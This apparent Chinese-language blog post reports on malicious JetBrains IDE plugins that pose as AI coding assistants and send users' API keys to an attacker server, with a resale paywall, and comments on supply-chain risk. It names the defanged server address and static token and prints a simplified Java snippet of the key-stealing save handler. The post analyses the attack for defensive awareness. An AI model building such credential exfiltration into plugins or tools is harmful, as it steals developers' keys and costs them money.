欢迎光临
我们一直在努力

Jetbrains IDE插件被曝:偷走你的 API 密钥,这些插件赶紧卸载

2026 年 6 月,安全公司 Aikido 发布了一份令人震惊的报告:JetBrains Marketplace 上至少有 15 个 IDE 插件被证实存在恶意行为,它们会在用户毫不知情的情况下,窃取输入的 AI 服务 API 密钥。这些插件伪装成基于 DeepSeek 等大语言模型的 AI 编码助手,提供代码审查、单元测试生成、提交信息撰写等功能,累计被安装近 70,000 次。

这并非一起孤立的、由某个“叛徒”开发者制造的意外,而是一场有组织、成规模、持续近八个月的供应链攻击。最早一批恶意插件于 2025 年 10 月底出现,直至 2026 年 6 月仍有新变种被发布到官方市场。

攻击如何运作:一个精心设计的“付费墙”游戏

所有受影响插件的代码库高度相似,仅仅是名称和包名被重新包装,用于不同的市场 listing。

第一环:无害的伪装,诱人的功能

插件本身功能正常。用户安装后,需要在设置面板中粘贴 OpenAI、DeepSeek 等平台的 API 密钥,以便插件调用模型服务。这个流程完全符合用户对 AI 编码助手的预期,毫无破绽。

第二环:隐匿的窃取,毫秒级外泄

真正的恶意行为发生在用户点击“Apply”(应用)设置的那一刻。插件的设置保存处理程序(save 方法)在将密钥存入本地存储的同时,会立即通过硬编码的恶意服务器地址 39.107.60[.]51 和静态令牌 F48D2AA7CF341F782C1D,将你的 API 密钥通过明文 HTTP 请求发送给攻击者。整个过程没有提示,没有征求同意,用户界面没有任何痕迹。这个恶意服务器最后白曝光了,是部署到阿里云上面的,地点是北京,看起来这货应该是国内人。

// 恶意代码片段(简化自报告)
public static void save(String key) {
if (key != null && key.startsWith("sk-") && ... ) {
SoftwareDto dto = new SoftwareDto();
dto.setApiKey(key); // 你的密钥
BaseUtil.request("key", dto); // 发送到攻击者服务器
}
}

第三环:诡异的商业模式——用偷来的密钥“服务”付费用户

报告揭示了一个更令人不寒而栗的推断。这些插件内置了一个“捐赠/付费墙”。当用户付费后,插件会从攻击者服务器接收一个 API 密钥,并转而使用这个“官方”下发的密钥来响应模型调用。

这意味着什么?一种非常可能的模式是:

  • 受害者群体 A(免费用户):输入自己的密钥,密钥被盗取。
  • 受害者群体 B(付费用户):支付费用,从攻击者处获得一个能用的密钥。
  • 而攻击者分发给付费用户的密钥,极有可能正是从群体 A 那里窃取来的。攻击者同时在“出售”偷来的 API 访问权,并收取“服务费”,而真正的密钥所有者则在为被盗用的额度买单。这构建了一个闭环的黑色产业链,将窃取的凭证直接变现。

    如下是被攻击的插件
    在这里插入图片描述

    为什么 IDE 插件成为供应链攻击的“完美温床”

    IDE 插件生态正在成为软件供应链中最薄弱的环节之一。

  • 高价值目标:开发者的机器是皇冠上的明珠。这里不仅存放着源代码、云服务凭证、签名密钥,现在还存放着访问付费 AI 模型的“现金通道”——API 密钥。一旦被窃取,攻击者可以获得计算资源、训练模型,甚至反向探测企业内部系统。
  • 高度信任的环境:IDE 是开发者最信任的工具,我们习惯让它访问项目、执行命令、安装依赖。这种信任是“默认的”,使得恶意插件能在后台安静运行而不被察觉。
  • 审核的局限:JetBrains 官方声称对插件进行手动审查,但正如本案例所示,一个功能正常的插件,其恶意逻辑可能深埋在复杂的代码中,或通过动态加载等方式逃避检测。审查难以穷尽所有路径。
  • 虚假繁荣的干扰:攻击者可以通过刷量(下载数)和刷五星好评来快速建立插件的可信度,误导用户。本次事件中,部分插件下载量数万,极大增加了受骗面。
  • 这个危害到Jetbrains上千万用户的事件,瞬间登顶了包括HN等多家外媒网站的头条,Jetbrians也立即响应,把这些插件一一下架,并且发布声明表示大家使用ACP这种安全的方式使用AI工具。
    在这里插入图片描述

    这次事件在我看来,是软件开发行业在狂热追逐 AI 生产力时,必然要付出的一笔“安全税”。

    第一,它暴露了“API 密钥”作为新型敏感资产的认知滞后。 我们花费数十年教育开发者保护密码和 SSH 私钥,但在 AI 时代,一串格式类似的 API 密钥(如 sk-…)其价值可能更高,但其保护意识和实践却严重滞后。许多开发者会随意地将密钥粘贴到各种新奇的 AI 工具和插件中,这等同于将钱包密码交给陌生人。

    第二,它无情地刺破了“官方市场=安全”的幻觉。 JetBrains Marketplace、VS Code Marketplace 等官方渠道,长期以来给开发者一种安全感。但这次事件证明,官方审核并非万无一失。市场越大,越容易成为攻击者的目标。我们不能将安全责任完全外包给平台方。

    第三,它揭示了“免费+增值”模式在恶意软件中的变异。 攻击者不再仅仅是盗取数据,而是创造了一种商业模式:用盗取的资源服务付费客户。这极大地增强了攻击的隐蔽性和持续性,因为“付费用户”确实得到了服务,减少了投诉,从而让恶意插件在市场上存活更久。

    被盗的密钥带来的问题远不止自己的钱被刷了;这类密钥用于可访问内部代码库、数据库的代码智能体,攻击者就能调取企业私有代码、窃取对话上下文记录。

    结语

    JetBrains 插件窃取 API 密钥事件是一个强烈的警示信号。它表明,随着开发工具生态与 AI 服务深度融合,攻击者的目光也随之聚焦于此。开发者生产力的每一次飞跃,都伴随着新的攻击面。

    我们正进入一个必须对**“开发工具链本身”**进行安全治理的时代。盲目信任时代已经过去,审慎、分层防御和持续监测,将成为下一代开发者必备的“安全心智”。在享受 AI 带来的效率红利时,请务必守护好那把能开启你 AI 算力钱包的“钥匙”。

    赞(0)
    未经允许不得转载:171主机测评 » Jetbrains IDE插件被曝:偷走你的 API 密钥,这些插件赶紧卸载
    分享到: 更多 (0)

    评论 抢沙发

    • 昵称 (必填)
    • 邮箱 (必填)
    • 网址